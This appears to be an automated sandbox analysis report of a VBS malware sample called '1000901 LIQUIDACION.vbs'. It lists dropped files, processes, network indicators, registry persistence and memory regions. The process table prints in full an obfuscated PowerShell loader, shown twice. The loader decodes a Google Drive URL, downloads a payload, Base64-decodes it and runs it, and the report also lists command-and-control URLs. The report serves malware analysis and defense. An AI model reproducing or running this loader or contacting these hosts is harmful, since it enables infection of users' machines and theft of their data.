Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
1000901 LIQUIDACION.vbs
|
ASCII text, with very long lines (363), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a53lwhhr.jni.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzq41opo.35o.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfphdkba.zfv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no41w1de.rju.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\yF672G
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie
0x36, schema 4, UTF-8, version-valid-for 7
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Medikamentel.Ddg
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function
Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons,
$Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo
SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos
drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1
Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and
FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU
armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho
Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw
NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6
AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend
'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves
Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos
Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere
(Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA
skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne
= Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd
TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse
Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic
BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl
Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan
i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur elHum,uoFrimefTaskefDamari.luserIm aveThril.Ensars
K.gepSemiolLsereiAdj,nt Muns( Daem$Ri.beSTer.otFilmiaEjendrJvnfrtFond.nPortegDomnel KarmeReju,sHamme)Diosm ');$Halloffire=$Tiresol[0];Surere
(Herremaend 'Udsk.$Odo igSygevl Stifo CharbTeor,aAntitlBekle:HenslDUlselrPoussoPolydn AmbinTituliArthrnBarwigGitt,l uperuAfkr.nLaan,dCourtsSrlig=
OkseN Gas.e,ardewHisto-interOGelfobMolerjNonpreHandecGracetB,nem BlouS TubiyTap us Par tRupice AshrmMet.e.chinkNBarneeTrde,tDataa.ClencW
AstreMistybAbaseCOil.alBas,giBrum,eSpejlnSandet lint ');Surere (Herremaend 'Centg$RokadDTilstrOwerwoUnrevnTangfn Macri T ilnescapgPr,hil
MiliuSenionC.rpodDe nesPinde.SkaftHLivereN,ncoaS.irodKol.eeAdelsrDelirs Unbe[Unven$aphesAT,ansp Pi,nyUnvaro CablnTartwi MeshnChees1Danse8
Oper2Snkel]F rsv= Ri,s$folkeMRa leo Non nFi unosafias UdsttKasseisuperc ClarhOrdfoiP rlacSorg. ');$Plantaginales173=Herremaend
'Jv frDc talrdykehoUsm,gnAutorn Sttei T.ksnZollegRh.zolXanthu Ko.vnCaverdPastrsS.eak.Kund D Apeno E krwSortin Sh.tl,scitoBran
aMammod CardF.emiciHoejalHderseOps a(Regul$JuftsHRadioa ,ounl Na,rlRe,ero Str fEft rfPotleiSam.er DoojeHverv, Bedv$ VestU
TroedBinucpboldtoPelobsTeatenDrys.iSkrivnVirilgRygs.)Forur ';$Plantaginales173=$Frituren[1]+$Plantaginales173;$Udposning=$Frituren[0];Surere
(Herremaend 'Uegen$c ccigBydefl HedeoRedneb Boneabatc lbevid:MosshS Fwele Frilp,lgefaVelkerpri,rv,lufrcGing.rUnglu=Hek e(
PetaTPurlieAlloms epugtskyde- SejrPEquilaSk.tttPrew hSheen Ophi$Sort.U.tjdmdCatnipBe kyoDeters SnoonRecepi Beken TerrgUnive)Dativ
');while (!$Separvcr) {Surere (Herremaend 'skaer$Sleepg eedilfiliao forhbSkovbaFja,tlUnder:olentVCatena D,dinStamtsTalmakTristeRdbyelManiciPalmag
Cleas Som,t Drese ejssBigam=backr$Jehult ignarPers uP.ospePit,h ') ;Surere $Plantaginales173;Surere (Herremaend 'KomplSNervetRealkaErinnrFrem,t
hypo-SchatSDorsol ,eteeOrigie TeenpP,rip .dmin4Sor,e ');Surere (Herremaend '.atho$Di,itgU,aall Sub.oArmorb,nteraReinvlLim.n:Akva,S.dsteeConvep
HoveaGi,ntrDa,bovac rucBohemrDa,br= Pudd(PledgT SuckeSplics NondtAbd,l-ConveP A.sia Asset Toishno,th Asyl$PsykoUFolkedEnt,rpGpiibo
Indes,dmntnselvmi Bls.nMajorgbedri)hujed ') ;Surere (Herremaend 'Forfa$VisiogBekenlU.frio Udlbb st,eaChairlGamps:Jor.vOlangup
Kli,nGastra AnsiaK,loreHydanlShreds F reeFodgarRe.sesS,ang=Klora$ Pateg Denol SlagoIncurb repraSterelIndlg:SlangBPlansyNonregInte.nAfiseiUncomnHderkg
Ih.asPantomSubtesD silsjoseti U brgAnsgn+Sungr+Kredi% Muck$KendiTAlmani PrferSkopueSk,rrsOptagoHandll Bety.HypoccSnderoRamequnoxianCrypttS
boe ') ;$Halloffire=$Tiresol[$Opnaaelsers];}Surere (Herremaend ' Isak$ Mgfag orgnlSki po,zimibstavea rserlUncha: TillDFl.lsaDatacaFester
Ca.ueAkto,kGeraniDendrsHandet BereeChe gnExtra1Nonab1Rowd.3Patru Enogt=Mi il aguG luoreskubbt Yach-SpateCSandso FiftnAspidtDrhaaeShidenIndiat
M,ps Taver$Li,elUTindidOffenp Sta.o DermsKlagenHomefiQ arrnSa.sagSiffl ');Surere (Herremaend 'kommu$IntergTr.nslFosteo S.iabBefj.aOverglIdrcd:Pre.oABlo,knPaabdaCou.il.eremoSlattg
MohriMatr e Ga,asYetap Ci,no=Str,f Stylt[ StrySKamelyS,artsToptitUnfiteNonscmWrig..ForfrCstal.oTa.dpnBar.ivStuveeFryser Bi.ltBlung]Ru,de:Endot:T,gneFBe.lyrBiunioGenermOrdu.B.rianaSto,rsRo.teeAntib6Pejor4
VariSArchstLemn rLurediKellinFlawegBurgh(overs$FljlsDhennaa.ingwac,ller .ypheDayb k UnreiFot,es aturtDekupeDiscrn Tils1Virak1Dorso3W.oli)Rent,
');Surere (Herremaend '.drin$Autarg.orfrlMundsoDisc.bFremoaBiofylSkriv:InterC Afsku Imbelvolcat AspouSensirSkratoIr,nelAilanoLitisgDetekyGall,
Micki=Tingb Ung a[ DemoSGra mySlvets.argitSprinePetramKey l.KbenhTThyroeSlredxRedegt Bl,n. Ko pETos.onDelircIgu noSal sd Ubesi
ArgynIkendgAnstr]Skudt:Styre:PreexAN xesSUnhonCUdfleI.fsluII dbr.,rahmGTivolePape tDisteSEge pt Ca.ar ArabiLi,renU,abagHf,rc(diane$IrrigAIwortnSkovtaAstrol
Benro Spo.g Offei B.ugergtopsSever)Anst. ');Surere (Herremaend 'T.ans$DiscogNep.elSdmlkoK,opsbSpidsaCarnilStyk.:Spat.SPlatyp
ynerePinstrBnnemmK,ytna ReantLeisuoFy rez Reeno chauiDefuncPr.gr= Ento$ Fo,fCDoublu CentlCreedtUdpumuRep.erNo,thoniklalStolpoHjulegTransyForu
.RealisEf.acuSuperb DecisFascitDimenrL.satihydronS enogNonni(Scr,e3Kir,e2Mosk 8Be,ys9 ailr3liber3P eud,Samle2Unret8T,stn8,yper2Barn.8Unde.)
Tyng ');Surere $Spermatozoic;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function
Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons,
$Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo
SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos
drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1
Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and
FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU
armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho
Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw
NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6
AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend
'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves
Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos
Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere
(Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA
skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne
= Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd
TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse
Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic
BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl
Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan
i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur elHum,uoFrimefTaskefDamari.luserIm aveThril.Ensars
K.gepSemiolLsereiAdj,nt Muns( Daem$Ri.beSTer.otFilmiaEjendrJvnfrtFond.nPortegDomnel KarmeReju,sHamme)Diosm ');$Halloffire=$Tiresol[0];Surere
(Herremaend 'Udsk.$Odo igSygevl Stifo CharbTeor,aAntitlBekle:HenslDUlselrPoussoPolydn AmbinTituliArthrnBarwigGitt,l uperuAfkr.nLaan,dCourtsSrlig=
OkseN Gas.e,ardewHisto-interOGelfobMolerjNonpreHandecGracetB,nem BlouS TubiyTap us Par tRupice AshrmMet.e.chinkNBarneeTrde,tDataa.ClencW
AstreMistybAbaseCOil.alBas,giBrum,eSpejlnSandet lint ');Surere (Herremaend 'Centg$RokadDTilstrOwerwoUnrevnTangfn Macri T ilnescapgPr,hil
MiliuSenionC.rpodDe nesPinde.SkaftHLivereN,ncoaS.irodKol.eeAdelsrDelirs Unbe[Unven$aphesAT,ansp Pi,nyUnvaro CablnTartwi MeshnChees1Danse8
Oper2Snkel]F rsv= Ri,s$folkeMRa leo Non nFi unosafias UdsttKasseisuperc ClarhOrdfoiP rlacSorg. ');$Plantaginales173=Herremaend
'Jv frDc talrdykehoUsm,gnAutorn Sttei T.ksnZollegRh.zolXanthu Ko.vnCaverdPastrsS.eak.Kund D Apeno E krwSortin Sh.tl,scitoBran
aMammod CardF.emiciHoejalHderseOps a(Regul$JuftsHRadioa ,ounl Na,rlRe,ero Str fEft rfPotleiSam.er DoojeHverv, Bedv$ VestU
TroedBinucpboldtoPelobsTeatenDrys.iSkrivnVirilgRygs.)Forur ';$Plantaginales173=$Frituren[1]+$Plantaginales173;$Udposning=$Frituren[0];Surere
(Herremaend 'Uegen$c ccigBydefl HedeoRedneb Boneabatc lbevid:MosshS Fwele Frilp,lgefaVelkerpri,rv,lufrcGing.rUnglu=Hek e(
PetaTPurlieAlloms epugtskyde- SejrPEquilaSk.tttPrew hSheen Ophi$Sort.U.tjdmdCatnipBe kyoDeters SnoonRecepi Beken TerrgUnive)Dativ
');while (!$Separvcr) {Surere (Herremaend 'skaer$Sleepg eedilfiliao forhbSkovbaFja,tlUnder:olentVCatena D,dinStamtsTalmakTristeRdbyelManiciPalmag
Cleas Som,t Drese ejssBigam=backr$Jehult ignarPers uP.ospePit,h ') ;Surere $Plantaginales173;Surere (Herremaend 'KomplSNervetRealkaErinnrFrem,t
hypo-SchatSDorsol ,eteeOrigie TeenpP,rip .dmin4Sor,e ');Surere (Herremaend '.atho$Di,itgU,aall Sub.oArmorb,nteraReinvlLim.n:Akva,S.dsteeConvep
HoveaGi,ntrDa,bovac rucBohemrDa,br= Pudd(PledgT SuckeSplics NondtAbd,l-ConveP A.sia Asset Toishno,th Asyl$PsykoUFolkedEnt,rpGpiibo
Indes,dmntnselvmi Bls.nMajorgbedri)hujed ') ;Surere (Herremaend 'Forfa$VisiogBekenlU.frio Udlbb st,eaChairlGamps:Jor.vOlangup
Kli,nGastra AnsiaK,loreHydanlShreds F reeFodgarRe.sesS,ang=Klora$ Pateg Denol SlagoIncurb repraSterelIndlg:SlangBPlansyNonregInte.nAfiseiUncomnHderkg
Ih.asPantomSubtesD silsjoseti U brgAnsgn+Sungr+Kredi% Muck$KendiTAlmani PrferSkopueSk,rrsOptagoHandll Bety.HypoccSnderoRamequnoxianCrypttS
boe ') ;$Halloffire=$Tiresol[$Opnaaelsers];}Surere (Herremaend ' Isak$ Mgfag orgnlSki po,zimibstavea rserlUncha: TillDFl.lsaDatacaFester
Ca.ueAkto,kGeraniDendrsHandet BereeChe gnExtra1Nonab1Rowd.3Patru Enogt=Mi il aguG luoreskubbt Yach-SpateCSandso FiftnAspidtDrhaaeShidenIndiat
M,ps Taver$Li,elUTindidOffenp Sta.o DermsKlagenHomefiQ arrnSa.sagSiffl ');Surere (Herremaend 'kommu$IntergTr.nslFosteo S.iabBefj.aOverglIdrcd:Pre.oABlo,knPaabdaCou.il.eremoSlattg
MohriMatr e Ga,asYetap Ci,no=Str,f Stylt[ StrySKamelyS,artsToptitUnfiteNonscmWrig..ForfrCstal.oTa.dpnBar.ivStuveeFryser Bi.ltBlung]Ru,de:Endot:T,gneFBe.lyrBiunioGenermOrdu.B.rianaSto,rsRo.teeAntib6Pejor4
VariSArchstLemn rLurediKellinFlawegBurgh(overs$FljlsDhennaa.ingwac,ller .ypheDayb k UnreiFot,es aturtDekupeDiscrn Tils1Virak1Dorso3W.oli)Rent,
');Surere (Herremaend '.drin$Autarg.orfrlMundsoDisc.bFremoaBiofylSkriv:InterC Afsku Imbelvolcat AspouSensirSkratoIr,nelAilanoLitisgDetekyGall,
Micki=Tingb Ung a[ DemoSGra mySlvets.argitSprinePetramKey l.KbenhTThyroeSlredxRedegt Bl,n. Ko pETos.onDelircIgu noSal sd Ubesi
ArgynIkendgAnstr]Skudt:Styre:PreexAN xesSUnhonCUdfleI.fsluII dbr.,rahmGTivolePape tDisteSEge pt Ca.ar ArabiLi,renU,abagHf,rc(diane$IrrigAIwortnSkovtaAstrol
Benro Spo.g Offei B.ugergtopsSever)Anst. ');Surere (Herremaend 'T.ans$DiscogNep.elSdmlkoK,opsbSpidsaCarnilStyk.:Spat.SPlatyp
ynerePinstrBnnemmK,ytna ReantLeisuoFy rez Reeno chauiDefuncPr.gr= Ento$ Fo,fCDoublu CentlCreedtUdpumuRep.erNo,thoniklalStolpoHjulegTransyForu
.RealisEf.acuSuperb DecisFascitDimenrL.satihydronS enogNonni(Scr,e3Kir,e2Mosk 8Be,ys9 ailr3liber3P eud,Samle2Unret8T,stn8,yper2Barn.8Unde.)
Tyng ');Surere $Spermatozoic;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
|
"C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe"
|
|
|
|
C:\Windows\SysWOW64\replace.exe
|
"C:\Windows\SysWOW64\replace.exe"
|
|
|
|
C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
|
"C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY
|
162.241.253.78
|
||
|
http://www.dhleba51.ru/im2z/
|
195.24.68.5
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.webwheelsmedia.com
|
unknown
|
|
|
|
webwheelsmedia.com
|
162.241.253.78
|
||
|
www.dhleba51.ru
|
195.24.68.5
|
||
|
drive.google.com
|
142.250.101.100
|
||
|
drive.usercontent.google.com
|
142.251.2.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
162.241.253.78
|
webwheelsmedia.com
|
United States
|
||
|
195.24.68.5
|
www.dhleba51.ru
|
Russian Federation
|
||
|
142.251.2.132
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.101.100
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
YDN4C
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 12 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
55C0000
|
unkown
|
page execute and read and write
|
|
|
|
2B347A73000
|
trusted library allocation
|
page read and write
|
|
|
|
2250000
|
system
|
page execute and read and write
|
|
|
|
5DF1000
|
trusted library allocation
|
page read and write
|
|
|
|
29A0000
|
trusted library allocation
|
page read and write
|
|
|
|
29E0000
|
trusted library allocation
|
page read and write
|
|
|
|
8790000
|
direct allocation
|
page execute and read and write
|
|
|
|
24F0000
|
system
|
page execute and read and write
|
|
|
|
2CB0000
|
system
|
page execute and read and write
|
|
|
|
91BB000
|
direct allocation
|
page execute and read and write
|
|
|
|
2A40000
|
heap
|
page read and write
|
||
|
7EF50000
|
trusted library allocation
|
page execute and read and write
|
||
|
E10000
|
trusted library allocation
|
page read and write
|
||
|
25BD000
|
heap
|
page read and write
|
||
|
2C7C000
|
heap
|
page read and write
|
||
|
4B30000
|
heap
|
page execute and read and write
|
||
|
2881000
|
heap
|
